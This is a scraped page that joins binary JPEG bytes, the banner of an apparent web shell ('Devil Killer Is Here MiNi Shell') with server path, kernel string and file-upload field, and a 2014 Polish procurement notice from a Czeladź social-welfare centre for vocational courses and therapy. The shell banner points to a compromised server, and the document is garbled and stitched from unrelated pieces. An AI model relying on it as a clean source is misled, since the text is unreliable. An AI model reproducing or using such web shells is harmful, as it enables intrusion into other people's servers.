JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140808/172417-N-2014.html

<p class="kh_header"><b>Czeladź: Przedmiotem zamówienia jest usługa obejmująca szkolenia zawodowe, szkolenia z zakresu psycholog. - doradczego, szkolenie wyjazdowe z zakresu treningu umiejętności społecznych i doradztwa zawodowego oraz specjalis. poradnictwo prawne, rodzinne i psychologiczne i terapia psycholog. dla osób uzależnionych od alkoholu w ramach projektu współfinansowanego ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy MOPS w Czeladzi  w ramach PO KL 2007 - 2013 w 2014</b><br>
<b>Numer ogłoszenia: 172417 - 2014; data zamieszczenia: 08.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 17 Lipca 27, 41-250 Czeladź, woj. śląskie, tel. 032 2651442, faks 032 2656811 w. 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.czeladz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa obejmująca szkolenia zawodowe, szkolenia z zakresu psycholog. - doradczego, szkolenie wyjazdowe z zakresu treningu umiejętności społecznych i doradztwa zawodowego oraz specjalis. poradnictwo prawne, rodzinne i psychologiczne i terapia psycholog. dla osób uzależnionych od alkoholu w ramach projektu współfinansowanego ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy MOPS w Czeladzi  w ramach PO KL 2007 - 2013 w 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia
Przedmiotem zamówienia jest usługa obejmująca organizowanie i przeprowadzenie szkoleń zawodowych, szkoleń z zakresu psychologiczno - doradczego, szkolenia wyjazdowego z zakresu treningu umiejętności społecznych i doradztwa zawodowego oraz specjalistycznego poradnictwa prawnego, rodzinnego i psychologicznego i terapii psychologicznej dla osób uzależnionych od alkoholu w ramach projektu współfinansowanego ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach PO KL 2007 - 2013 w  2014r.
Kody CPV:
80 50 00 00 - 9 Usługi szkoleniowe
80 53 00 00 - 8 Usługi szkolenia zawodowego
79 14 00 00 - 7 Doradztwo prawne i usługi informacyjne
85 31 23 20 - 8 Usługi doradztwa
85 12 12 70 - 6 Usługi psychiatryczne lub psychologiczne
80 57 00 00 -  0 usługi szkolenia w dziedzinie rozwoju osobistego
55 00 00 00 -  0 Usługi restauracyjne, hotelarskie i handlu detalicznego
Charakterystyka przedmiotu zamówienia:
Część I
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Kurs kosmetyczny i wizażu, manicure, pedicure, stylizacji paznokci + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalnej.
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 5 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych.

Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien obejmować co najmniej:
utrzymanie wyglądu i prezentacji osobistej,
kultura obsługi klienta,
podstawowe informacje dotyczące wyposażenia gabinetu w sprzęt, narzędzia, aparaty, materiały i kosmetyki wykorzystywane w pracy,
zasady bhp i p.poż. w pracy kosmetyczki,
pielęgnacja skóry i twarzy,
zabiegi na ciało,
elementy masażu,
zajęcia z zakresu dermatologii, anatomii i higieny,
manicure tradycyjny i biologiczny,
masaż i pielęgnacja dłoni (m. in. zabieg parafinowania),
pedicure,
masaż i pielęgnacja stopy,
pielęgnacja paznokci,
zdobienie paznokci (m. in. manicure francuski),
przyklejanie i zdobienie sztucznych paznokci,
nakładanie tipsów metodą żelową i akrylową,
stylizacja - określenie typu urody i sylwetki, dobór fryzury, ubioru, korekcji stylu, figury, twarzy, zastosowanie dodatków, elementy wizażu,
makijaż odpowiedni do typu urody,( dzienny, ślubny, wieczorowy)
makijaż permanentny (teoria i praktyka): historia, cel, efekty, wskazania, i przeciwwskazania.
obsługa kasy fiskalnej

Część II

kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Kurs kucharz, barman, kelner + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalnej 
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 11 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.

Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych.

Przykładowy zakres tematyczny szkolenia
Program kursu powinien obejmować co najmniej:
- bhp, zasady bezpieczeństwa żywności, HACCP,
- szkolenie z zakresu minimum sanitarnego,
- podstawowe informacje nt nazw, pojęć i określeń typowych w gastronomii,
- klasyfikacja surowców, półproduktów i gotowych wyrobów w zależności od pochodzenia 
i wartości odżywczej,
- identyfikacja i wykorzystanie informacji zawartych na opakowaniach,
- obliczanie surowców i półproduktów potrzebnych do sporządzania potraw, przewidywanie czasu potrzebnego na wykonanie potraw,
- dobieranie narzędzi, naczyń, maszyn i urządzeń do wykonywania czynności,
- techniki przyrządzania potraw,
- skutki niezgodnego z normami wykorzystania surowców i półproduktów,
- dobieranie surowców i technik wykonania potraw w zależności od diety,
- zasady przygotowania potraw z wybranej kuchni regionalnej,
- estetyka podawania potraw,
- sylwetka barmana - kelnera,
- utrzymania wyglądu i prezentacji osobistej,
- sprzęt barowy
- techniki miksowania napojów,
- organizacja i technika pracy w cocktail barze,
- kultura i techniki obsługi klienta,
- rozliczenia i wydawanie rachunków,
- podstawowe czynności kelnerskie,
- zasady obsługi baru, bufetu,
- obsługa kasy fiskalnej.



Część III

kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Profesjonalna obsługa firmy - kurs księgowości, kadry, płace, ZUS + Moduł asystencko - sekretarski + sztuka negocjacji 
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 6 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych.

Przykładowy zakres tematyczny szkolenia
Program kursu powinien obejmować co najmniej:
I Księgowość:
1. Podstawy i organizacja rachunkowości 
- zasady rachunkowości, 
- księgi rachunkowe i ich rodzaje, 
2. Konta księgowe (rodzaje)
3. Sprawozdania finansowe i statystyczne. 
4. Bilans. 
5. Rachunek zysków i strat. 
6. Klasyfikacja kosztów. 
7. Rachunek przepływów pieniężnych 
- prowadzenie i przechowywanie dokumentacji, 
II Kadry,płace, ZUS: 
1. Prawo pracy po nowelizacji - źródła i zasady. 
2. Forma, treść, sposób zawierania i rodzaje umów o pracę.
3. Rozwiązanie umowy o pracę za wypowiedzeniem i bez wypowiedzenia, wygaśnięcie umowy.
4. Wynagrodzenie za pracę, za godziny nadliczbowe i za czas przestoju.
5. Regulamin wynagrodzenia za pracę.
6. Obowiązki pracodawcy w zakresie prowadzenia akt osobowych i dokumentacji związanej ze stosunkiem pracy.
7. Obowiązki pracownika wynikające z Kodeksu Pracy, wykazy obowiązków służbowych, zakresy odpowiedzialności.
8. Regulamin pracy. 
9. Czas pracy. Praca w godzinach nadliczbowych, w niedziele i święta.
10. Urlopy pracownicze.
11. Ochrona danych osobowych.
Prawo ubezpieczeń społecznych 
1. Świadczenia z ubezpieczenia społecznego na wypadek choroby i macierzyństwa.
2. Rodzaje zasiłków, dokumentowanie prawa do zasiłków, podstawa wymiaru zasiłków
Naliczanie płac
1. Elementy składowe płac.
2. Ustalanie zaliczki na podatek dochodowy od osób fizycznych.
3. Dokumentacja wynagrodzeń. 
4. Obowiązki zakładu pracy przy rozliczaniu podatku dochodowego od osób fizycznych
5. Ewidencja płac.
6. Wykazanie danych o płacach w sprawozdaniu finansowym. 
III Moduł asystencko - sekretarski 
1.Organizacja pracy sekretariatu
2.Psychologia pracy sekretarki
3.Obsługa urządzeń biurowych 
IV Sztuka negocjacji
1. Style i techniki negocjacji
2. Sztuka negocjacji
3. Wizerunek negocjatora


Część IV

kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Operator koparko - ładowarki wszystkie typy kl. III + Operator ładowarki jednonaczyniowej kl. III + Operator wózka widłowego
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 17 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin i program szkolenia
Szkolenie winno zostać zorganizowane zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r., Nr 118 poz. 1263).
Program szkolenia - minimum 300 godzin - musi zawierać co najmniej następujące zagadnienia:
część teoretyczna:
I. Operator koparko - ładowarki wszystkie typy kl. III 
1. dokumentacja techniczna maszyn roboczych,
2. bezpieczeństwo i higiena pracy przy eksploatacji maszyn roboczych
3. Podstawy elektrotechniki
4. Silniki spalinowe,
5. Elementy hydrauliki
6. technologii wykonywania robót ziemnych,
7. użytkowania i obsługi maszyn roboczych.
II. Operator ładowarki jednonaczyniowej kl. III
1. Budowa ładowarek jednonaczyniowych
2. technologia robót ładowarką jednonaczyniową
III Operator wózka widłowego
1. typy stosowanych wózków jezdniowych
2. czynności kierowcy w czasie pracy wózka

Część praktyczna obejmująca naukę eksploatacji maszyn roboczych w różnych warunkach terenowych i technologicznych.
Szkolenie musi zakończyć się sprawdzianem przeprowadzonych przez komisję powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
Szkolenie w zakresie obsługi wózków widłowych musi zakończyć się egzaminem UDT i uzyskaniem zaświadczenia kwalifikacyjnego do obsługi urządzeń transportu bliskiego Urzędu Dozoru Technicznego w przypadku jego pozytywnego zaliczenia.
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych (godzina szkolenia = godzina lekcyjna = 45 min).
Program szkolenia musi być zgodny z właściwymi przepisami, a w szczególności z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2001 r., Nr 118 poz. 1263)

Część V

kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Kurs monter instalacji wod-kan-gaz
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 10 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 200 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien obejmować co namniej:
Przepisy bhp, ochrona przeciwpożarowa, zasady udzielania pierwszej pomocy
Czytanie projektu instalacji wodociągowej, kanalizacyjnej i gazowej
Elementy instalacji wodociągowej
Połączenie gwintowe rur stalowych ocynkowanych
Połączenie lutowane rur miedzianych
Połączenie zgrzewane rur z polipropylenowych
Przygotowanie stanowiska pracy montera instalacji wodociągowej
Montaż przewodów i uzbrojenia instalacji wodociągowej
Montaż wodomierza
Montaż instalacji wodociągowej przeciwpożarowej
Próba szczelności i odbiór instalacji wodociągowej
Elementy instalacji kanalizacyjnej
Łączenie przewodów instalacji kanalizacyjnej
Przygotowanie stanowiska pracy montera instalacji kanalizacyjnej
Montaż przewodów i uzbrojenia instalacji kanalizacyjnej bytowo-gospodarczej
Montaż przewodów i uzbrojenia instalacji kanalizacyjnej deszczowej
Badanie szczelności i odbiór instalacji kanalizacyjnej
Przybory sanitarne i warunki ich montażu
Przygotowanie stanowiska pracy montera przyborów sanitarnych
Montaż przyborów sanitarnych
Elementy instalacji gazowych
Przyłącza gazowe
Rodzaje odbiorników
Odprowadzanie spalin
Zasady napraw i konserwacji instalacji wodociągowych, kanalizacyjnych i gazowych
Naprawa i konserwacja istniejących instalacji wodociągowych, kanalizacyjnych i gazowych
Kontrola prawidłowości działania instalacji wod-kan i gaz 

Część VI

kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Kurs ochrony osób i mienia
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 5 osób
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 250 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Program kursu powinien obejmować co najmniej:
- blok ogólnoprawny, 
- ochrony mienia, 
- ochrony osób, 
- wyszkolenia strzeleckiego oraz samoobrony,
- technik interwencyjnych.

Część VII

kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Kurs murarz - tynkarz - regipsiarz
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 3 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2014r.

Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 160 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien obejmować co najmniej :
wprowadzenie do zawodu murarz - tynkarz - regipsiarz,
podstawowe pojęcia z zakresu budownictwa,
technologia robót murarskich,
technologia robót tynkarskich,
nowoczesne metody wykorzystania tynków strukturalnych,
rysunek budowlany,
przepisy bhp i przeciwpożarowe,
zajęcia praktyczne

Część VIII

kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Kurs fryzjerski + dodatkowy moduł profesjonalnej obsługi klienta z obsługą kasy fiskalnej.
Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób:  5 osób
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien obejmować co najmniej :
utrzymanie wyglądu i prezentacji osobistej,
kultura obsługi klienta,
higiena i bezpieczeństwo pracy,
organizacja pracy w salonie fryzjerskim,
podstawy chemiczne materiałów fryzjerskich,
technologie fryzjerskie - pielęgnacja włosów, ondulowanie, strzyżenie, rozjaśnianie, dekoloryzacja, barwienie i układanie włosów,
metody wykonywania zabiegów pielęgnacyjno - leczniczych i chemiczno - upiększajacych,
techniki i stylizacja fryzur, 
budowa włosa, właściwości fizyczne,
modelowanie włosów z zastosowaniem różnych technik skręcania i prostowania
obsługa kasy fiskalnej,
zajęcia praktyczne. 

Część IX
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu: Kurs prawa jazdy KAT.B + badanie lekarskie + egzamin
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 23 osoby 
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
60 godzin na osobę w tym: 30 godz. teoretycznych w grupie (1 godzina = 45 minut) i 30 godz. praktycznych indywidualnie dla każdej osoby (1 godzina = 60 minut).
Zgodnie z rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 roku (Dz. u. z dnia 14 września 2012 roku, poz. 1019)
Zajęcia teoretyczne mogą odbywać się od poniedziałku do piątku w przedziale godzinowym od 16.00 do 20.00 oraz w soboty od 9.00-18.00.

Część X
kod CPV -  85 12 12 70 - 6 Usługi psychiatryczne lub psychologiczne
Przeprowadzenie terapii psychologicznej dla osób uzależnionych od alkoholu.
Liczba osób:  7 osób
Czas trwania : od dnia podpisania umowy do 31.12.2014r
Liczba godzin terapii
Przedmiotem zamówienia jest przeprowadzenie 72 godzin terapii psychologicznej dla grupy 7 osobowej 
(1 godzina = 60 minut).

Część XI
kod CPV:
80 50 00 00 - 9 usługi szkoleniowe
80 57 00 00 - 0 usługi szkolenia w dziedzinie rozwoju osobistego
85 31 23 20 - 8 usługi doradztwa

Zadanie A
Nazwa  szkolenia:  Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe
kod CPV - 80 57 00 00 - 0 
W szkoleniu powyższym będzie uczestniczyć 23 osoby podzielone na 2 grupy (12 i 11 osób) w celu zapewnienia uczestnikom dogodnych warunków w trakcie szkolenia. 
Liczba osób: 23 osoby.
Czas trwania szkolenia: od dnia podpisania umowy do 31.12.2014r
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych - 34 godz na osobę zajęć grupowych+1 godzina zajęć indywidualnych na osobę (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych.

Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien obejmować co najmniej :
komunikacja interpersonalna,
asertywność,
motywacja do zmiany, 
sporządzanie osobistego bilansu osiągnięć,
podniesienie kompetencji osobistych, 
budowanie poczucia własnej wartości,
badanie predyspozycji zawodowych,
sporządzanie planu kariery zawodowej,
metody i sposoby poszukiwania pracy,
kreowanie wizerunku zawodowego,
autoprezentacja, wpływ wizerunku na powodzenie w rozmowie kwalifikacyjnej

Zadanie B
kod CPV - 80 57 00 00 - 0
Nazwa szkolenia: Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe
Usługi szkolenia w dziedzinie rozwoju osobistego. Przewidziano do przeszkolenia 29 osób, 16 osób w wieku 15 - 30 oraz 13 osób powyżej 50 roku życia podzielonych na te 2 grupy wiekowe.
Liczba osób: 29 osób
Czas trwania szkolenia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych - 34 godz na osobę zajęć grupowych+1 godzina zajęć indywidualnych na osobę (godzina szkolenia = godzina lekcyjna = 45 min). Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien obejmować co najmniej :
komunikacja interpersonalna,
asertywność,
motywacja do zmiany, 
sporządzanie osobistego bilansu osiągnięć,
podniesienie kompetencji osobistych, 
budowanie poczucia własnej wartości,
badanie predyspozycji zawodowych,
sporządzanie planu kariery zawodowej,
metody i sposoby poszukiwania pracy,
kreowanie wizerunku zawodowego,
autoprezentacja, wpływ wizerunku na powodzenie w rozmowie kwalifikacyjnej,
z uwzględnieniem specyfiki grupy osób w wieku 18-25, jak również osób powyżej 50 roku życia 

Część XII
Organizacja i przeprowadzenie szkolenia wyjazdowego z zakresu treningu umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe 
CPV: 
80 50 00 00 - 9 usługi szkoleniowe
80 57 00 00 - 0 usługi szkolenia w dziedzinie rozwoju osobistego
85 31 23 20 - 8 usługi doradztwa
55 00 00 00 - 0 Usługi restauracyjne, hotelarskie i handlu detalicznego

Liczba osób i czas trwania szkolenia:
W szkoleniu powyższym będzie uczestniczyć grupa 10 osób niepełnosprawnych z umiarkowanym i lekkim stopniem niepełnosprawności (choroby układu oddechowego i krążenia, ruchowe), będące w wieku aktywności zawodowej, korzystające ze świadczeń pomocy społecznej, zagrożone wykluczeniem społecznym. Realizacja szkolenia trwać będzie 7 dni (6 noclegów) i musi zakończyć się do 31.12.2014r. Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych umiejętności, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych - 34 godz na osobę zajęć grupowych+1 godzina zajęć indywidualnych na osobę (godzina szkolenia = godzina lekcyjna = 45 min).
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien obejmować co najmniej :
komunikacja interpersonalna,
asertywność,
motywacja do zmiany, 
sporządzanie osobistego bilansu osiągnięć,
podniesienie kompetencji osobistych, 
budowanie poczucia własnej wartości,
strategia definiowania i rozwiązywania problemów życiowych,
zarządzanie czasem własnym oraz budżetem gospodarstwa domowego,
badanie predyspozycji zawodowych,
sporządzanie planu kariery zawodowej,
metody i sposoby poszukiwania pracy,
kreowanie wizerunku zawodowego,
autoprezentacja, wpływ wizerunku na powodzenie w rozmowie kwalifikacyjnej,
nauka niezależnego funkcjonowania z niepełnosprawnością

Część XIII
Nazwa szkolenia: Przeprowadzenie specjalistycznego poradnictwa prawnego, rodzinnego i psychologicznego 
kod CPV - 79 14 00 00 - 7 doradztwo prawne i usługi informacyjne
Przewidziano indywidualne konsultacje dla 62 osób.
Liczba osób: 62 osoby
Czas trwania : od dnia podpisania umowy do 31.12.2014r
Liczba godzin szkolenia
Indywidualne poradnictwo prawne. Przedmiotem zamówienia jest przeprowadzenie 62 godzin konsultacji prawnych (1 godzina = 60 minut)
Konsultacje w ramach poradnictwa psychologicznego z psychologiem lub psychoterapeutą. Przedmiotem zamówienia jest przeprowadzenie 62 godzin konsultacji psychologicznych i rodzinnych (1 godzina=60 minut).
